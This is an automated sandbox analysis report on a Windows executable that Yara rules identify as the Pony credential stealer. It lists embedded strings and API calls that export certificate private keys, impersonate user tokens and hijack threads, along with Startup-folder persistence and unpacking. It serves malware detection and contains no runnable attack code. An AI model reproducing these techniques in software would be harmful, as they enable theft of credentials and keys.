                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591=
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591B
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591W
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=168R
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/gws_rd=ssl
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/W9
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/searchLMEM
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00403879 recv,1_2_00403879
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649420968.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  E-Banking Fraud:

                  Yara detected Pony
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

                  System Summary:

                  Potential malicious icon found
                  Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B40D590_2_04B40D59
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0041280A1_2_0041280A
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00402E461_2_00402E46
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_0041280A1_1_0041280A
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00402E461_1_00402E46
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B20D5910_2_04B20D59
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0041280A12_2_0041280A
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00402E4612_2_00402E46
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_0041280A12_1_0041280A
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00402E4612_1_00402E46
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00401D69 appears 60 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 0040417C appears 118 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00410D46 appears 36 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00410C9E appears 38 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00410E30 appears 84 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00401D15 appears 48 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00404131 appears 106 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 00401C8E appears 278 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: String function: 004052CA appears 32 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00401D69 appears 60 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 0040417C appears 118 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00410D46 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00410C9E appears 38 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00410E30 appears 84 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00401D15 appears 48 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00404131 appears 106 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 00401C8E appears 278 times
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: String function: 004052CA appears 32 times
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B41491 NtProtectVirtualMemory,0_2_04B41491
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B40A06 NtSetContextThread,0_2_04B40A06
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B21491 NtProtectVirtualMemory,10_2_04B21491
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B20A06 NtSetContextThread,10_2_04B20A06
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000000.645443664.000000000042B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTohndiges5.exe vs 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeBinary or memory string: OriginalFilenameTohndiges5.exe vs 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Adnexal8.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Adnexal8.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeVirustotal: Detection: 73%
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeMetadefender: Detection: 71%
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile read: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: unknownProcess created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeProcess created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe'
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeProcess created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00402896 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,1_2_00402896
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00402896 LookupPrivilegeValueA,GetCurrentProcess,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,1_1_00402896
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00402896 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,12_2_00402896
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00402896 LookupPrivilegeValueA,GetCurrentProcess,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,12_1_00402896
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D423
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_0040D423 CertOpenSystemStoreA,lstrcmpA,lstrcmpA,1_1_0040D423
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,12_2_0040D423
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_0040D423 CertOpenSystemStoreA,lstrcmpA,lstrcmpA,12_1_0040D423
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile created: C:\Users\user\AppData\Local\Temp\12537875.bat
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@16/4@0/1
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040A4C5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,1_2_0040A4C5
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile read: C:\Windows\win.ini
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00402C05 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,1_2_00402C05
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_01

                  Data Obfuscation:

                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeUnpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeUnpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeUnpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeUnpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
                  Yara detected aPLib compressed binary
                  Source: Yara matchFile source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
